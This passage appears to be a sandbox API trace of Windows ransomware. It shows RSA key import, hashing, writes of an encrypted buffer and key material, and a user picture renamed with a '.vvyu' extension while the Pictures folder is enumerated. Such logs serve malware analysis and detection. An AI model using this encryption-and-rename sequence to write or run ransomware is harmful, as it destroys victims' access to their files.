KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.502] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.503] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.503] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.503] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.503] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.503] GetLastError () returned 0x0 [0190.503] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.503] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.503] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.503] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.503] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc050) returned 0x2af5168 [0190.504] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3228 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dca0 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3270 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd18 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dce8 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.505] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dce8 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcd0 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0dcb8 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0190.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.507] GetCurrentThreadId () returned 0x5d8 [0190.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4f08 [0190.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.507] GetCurrentThreadId () returned 0x5d8 [0190.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dce8 [0190.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcd0 [0190.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd00 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ff348 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5eb8 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ed0 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ee8 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ed0 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcb8 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd00 | out: hHeap=0x2c0000) returned 1 [0190.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd18 | out: hHeap=0x2c0000) returned 1 [0190.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3270 | out: hHeap=0x2c0000) returned 1 [0190.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.517] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xc04a, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xc04a, lpOverlapped=0x0) returned 1 [0190.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.518] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc04f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.518] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.520] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.520] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.520] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.520] CloseHandle (hObject=0x584) returned 1 [0190.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0190.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0190.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0190.523] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\cbyFXHxALB9ISR--Iyv1.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\cbyfxhxalb9isr--iyv1.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\cbyFXHxALB9ISR--Iyv1.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\cbyfxhxalb9isr--iyv1.png.vvyu")) returned 1 [0190.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.524] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0190.527] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7ed1e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0190.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3270 [0190.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0190.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3270 | out: hHeap=0x2c0000) returned 1 [0190.528] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini") returned=".ini" [0190.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.528] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce933ee0, ftCreationTime.dwHighDateTime=0x1d89ee7, ftLastAccessTime.dwLowDateTime=0xe249e000, ftLastAccessTime.dwHighDateTime=0x1d8a208, ftLastWriteTime.dwLowDateTime=0xe249e000, ftLastWriteTime.dwHighDateTime=0x1d8a208, nFileSizeHigh=0x0, nFileSizeLow=0x14b87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DvPtakSDSqUBk1s-p5E_.jpg", cAlternateFileName="DVPTAK~1.JPG")) returned 1 [0190.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3270 [0190.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0190.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3270 | out: hHeap=0x2c0000) returned 1 [0190.529] 